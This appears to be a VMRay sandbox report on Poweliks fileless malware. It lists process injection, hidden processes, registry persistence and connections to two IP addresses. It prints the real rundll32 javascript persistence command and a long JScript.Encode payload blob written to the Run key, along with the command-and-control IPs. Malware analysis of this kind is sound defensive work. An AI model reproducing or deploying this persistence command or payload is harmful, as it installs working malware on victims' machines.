Poweliks Fileless Malware | VTI by Score
Try VMRay Analyzer
VTI Information
VTI Score
85 / 100
VTI Database Version 2.6
VTI Rule Match Count 14
VTI Rule Type Default (PE, ...)
Detected Threats
Arrow Injection Write into memory of another process
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" modifies memory of "c:\windows\syswow64\dllhost.exe"
Arrow Injection Modify control flow of another process
"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" alters context of "c:\windows\syswow64\dllhost.exe"
Arrow Anti Analysis Dynamic API usage
Resolve above average number of APIs.
Arrow Network Perform DNS request
Resolve host name "178.89.159.34".
Resolve host name "178.89.159.35".
Arrow Persistence Install system startup script or application
Add "rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")" to windows startup via registry.
Add "#@~^kXcAAA==W!x^DkKxP^WTcV* ODH ax +h,)mDk\p64N+1YcJ\dX:s cj+M\n.oHSuP:n vcTr#IXRKw+ `r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn Nc#p.Y;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\pr(Ln^D`J j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92 \rDGUs+UYUODbxLdvJ]Ar NrDuE*i2{h3J-'/HdhKhc'-Ar NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW' nSP)1Yb\+or(%+1YcJUm.raYk LRwkVjz/D+sr8Ln^DJbi6;x1YrG Pm[Uv#`YMzPDnDEMxPmR"no"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw- nY,0.Cs+hG.0Pd+D;a-w Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PDY;DU~ZiN86;x1YrG PNc;* a' nSP)1Yb\+or(%+1YcJt/ah^ RUnD7+Do\JC:KhRRTE*iaRK2+ `E!AKJS;B0CVkn*iac/xNv#p;0 'CRA62C N2 -kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP6Yor^+cE6UD~OME~O8#pr0vEWY* ;WDRMrY`6c.n/aW /nAG[H#IE6OR;VGd`#I;6'WR;.lOK6Ywk^n`!0U~DD;n*iE6O'6RMOok^+vEWxObpEW/{;0DR62xbdP6O?D.lhv#pE0kR"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnVYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nYsrV`;W #i)Nh4kVcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2 \r.Kx:UYvJnMG^+k/r#b`ECr#xJbn6,`,P6Y 3 mGNbUTTl=bUZq&RVnYUY.k oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\x#;I&I28ycL}y]Fj!wXI!T|wOpI(Bt(#T\(qKiMOylo]24ycOH/6Heq*V5o]\1xV1xsIz[qj2(U$(.u^h\.Y9(U)3`MoXIqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4 ]2( qtm*;"M.sClVI_s;5qFa5Ts"^y.O5sa*nZ46\(mOPy95}qHZqog*1&I^4UX?\t/\HTm,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k8H*1&]V(?Xj\}ktg!lq1;S0.Dlpp;}o1"}qqk(Cs/9VdtV.zpqHN}pgyoKW+j #En?X2\t2(:.Anlt4qs%Kq,0N 6sF;9B40qV(1zjF-t_.d}U(k9!\t(C1^|UX2\tw(:#i(A^FZx1+`]s4V. 5pIs#_VA}U(/&3HdI(1"JwAq5saa5zXK\sk}q}/5XymjHdI(1.J2wFNV194Vs.mzqd 81Xm2]V(?XH96TCq14m2]A} XV\ sZ}jTw}X]j($s5x.a8M"VmbX3}q}a4h.98y*"N_BFI&]-1kori^IPmV#Nl w/::sD}Uaqm]V5xsPmmkiCjk4Vs%qb6(jfV"[V.OS^BV\:asI&I28yc;pyok4!^E\!174 tV(x]w( X"oKW+i&"t4s]4mspk9oA4^ssO}o]V1x\2dV1s[AVOmVa^4 jE9MsZlq1E":at\&\G&V988x"w4qidKqs!5 Nst;q2rH]j($s5x.28VIsmbXA} \w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp sKm^d::.fiy6-N;aqlpx!9skqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!UqA(M.Otq*T5o]a4+lM(Ms mHLk`x#E9MsO\?6gelt}y#Vqb3Fmh.T[o9;q;]j($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6tq(:1ZCOEqV[4+8A4mhsO(;t8jVoXIqs9M.zFwA-mysZl OEhKbkKqoE\Mo!(&BXh?I`^xjV|jTL81ZmhV;t8!L9Aq\\C#d\?68iVsz5qq^N!jXnsA7mys!m1EhK3d:s!tMw!42BXnUI`mU.sFj!L8H!1:s;\F!LBwAz4yH^}ujX\?3F9wH*1&]V(jo"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\*T]V,O5qs!SV9V92s.my#YI:aw\(\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne("w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj*.e\VKsoTlo}^K .TCV,Vm.T3`&s"9M.O}o1"}qqb4u0E" .Z._sh\?Lk:s%1:,.8 \!S^[24NHHSs.;^ysh}`Xt9Ms+\jFs[Vt-}_\b|PDX\(I8ms*oxs#E1 oh\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np "31:..mH(wd3sE9:1.\?o08xj/4;a)|wY:+p1Ttq!;j #E9MsO\?*B8 Isms1Sj+jX9:VN}o\EUMoE\Mas`:.sp?4r}o^OKy9$} 1T(w1Xm2]V(?Xj9*TCqFsS0s!N!jX(&A:}oB mHV1XX(I*08Mj?}qeG|A*^NzFKesws52}oUXT`CIzFUhV.qX.5 \V::sZlotV:#!mM1V1X*_t("1}o]G4ypKqVNs[AF-}_#/\j44(:IdtUq2S0s!NhOD\?o04 #/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174 tV1x]N}L2!1:,D}:wy}:eTj2IHl *UF;9 oty\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(aG19Deja? 4t5qFq4 V##y.pI2$yq:1d":,!C_sHHsonjhw|qs$?sqwj.[Dj![-9.w782\h4V4a0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joAf$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt. AF$?o]~I3\n"CN~+w[cts4Ij2^Xmswgt2I6Io4Aq*t?o9VCVt%4saZMOeI!sHtA}"Iq]k}3\2Us9bj skt3XZf$pgsw_ix^l.yB(js9W+hH* 0}+}ZHHjts:21pe`Isj2[\}og(:M1`pZXq:[vd&s+wUikDw4wo 4`In. }CCN9flZe65:Os"Z,fn_3+48)7I34Igj%WlGov(&]5!sT5FAx[2js?Vs3s} pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\s|qM#XUV9^i!\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\w:2Ix58$!9FB2m(2P" mH f4Apj$Jljj.H!w# ws$SZsh`:tP:s9hn`6e}^oAHV^h"j90p:t?5LHI\so;dF9snj":} [652.oI!}h[Z*Vj`1|\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$"CVA^Mg250(apsYGI/Y$6o3+1w)!"fH#"MVe _m-HwLZlP~5g2%SVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA"f1yro2." 1Adys9UV9sCj\&pUOoIsNwpisB[A6 ?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C3!Z[2Df?oHXK.o8HVs-[0,G5yAh"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15xA~FygKNy(-js}:IuN2t..i}^B*VsT9FA$i_N21Gt~piwA5m.NZB25j(h`FVa}2s"njX2N8$B.q5l.%IB8A5q?j4A\2Hq:stfi`Ie}s2H?!Oy"MtNpN#Z`?dy9!1"UM3S\y";.joBpq6AS+Is#;, }0H|5K]}"29BP:N$?w40lP~5gMmW58#xL4A\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\j*$iAVUH^LSpiOyt:3XV[njVLhI&2p:V}yCV& 4^o2l^tM? V _N31yH5q:1e` I$n`qTNN45piwA"fA~KjBA`xo2C[\dFIs}LAFp`ear`s5K+3"]`.G}^G69y]TU.AB[AF9py4Xpi9\5k%..`sA}MG\tM#"5!!W}:\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js"\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\j2!l? oCj:*y}ssT"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\xtUi`N$IN#0."49"jsV.ZA&:M[A"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi"Z5jsxNN]W\LVh` 1T"3.x\j^Aq1]j`V`j+IhC29fjj$qIjo$`js$}^s5j#~roz\dF.5S8[wts#9Uy4%"s9"nsA\H8##.b%7.z%"#`F5j#A}s)-dF.}6:s9jG4qpi"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[ 1U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I +os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!"cpos6lV9+rj%-6js NN4`2]/5js}6:s9jG4qmT"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\H%-H`HrmMBigX%-6j2-+wt~KijA5tNpN$qKBM9V)"dX%Z82I6?:o!+A}A?o9%CAs$p`oA" to windows startup via registry.
Arrow Hide Tracks Write large data into the registry
Hide 61266 byte in "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run".
Hide 61268 byte in "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run".
Arrow Process Create process with hidden window
The process "C:\Windows\system32\rundll32.exe" starts with hidden window.
The process "C:\Windows\syswow64\dllhost.exe" starts with hidden window.
Arrow Process Create a page with write and execute permissions
Allocate a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.
Arrow Network Connect to remote host
Outgoing TCP connection to host "178.89.159.34:80".
Outgoing TCP connection to host "178.89.159.35:80".
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefox with deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image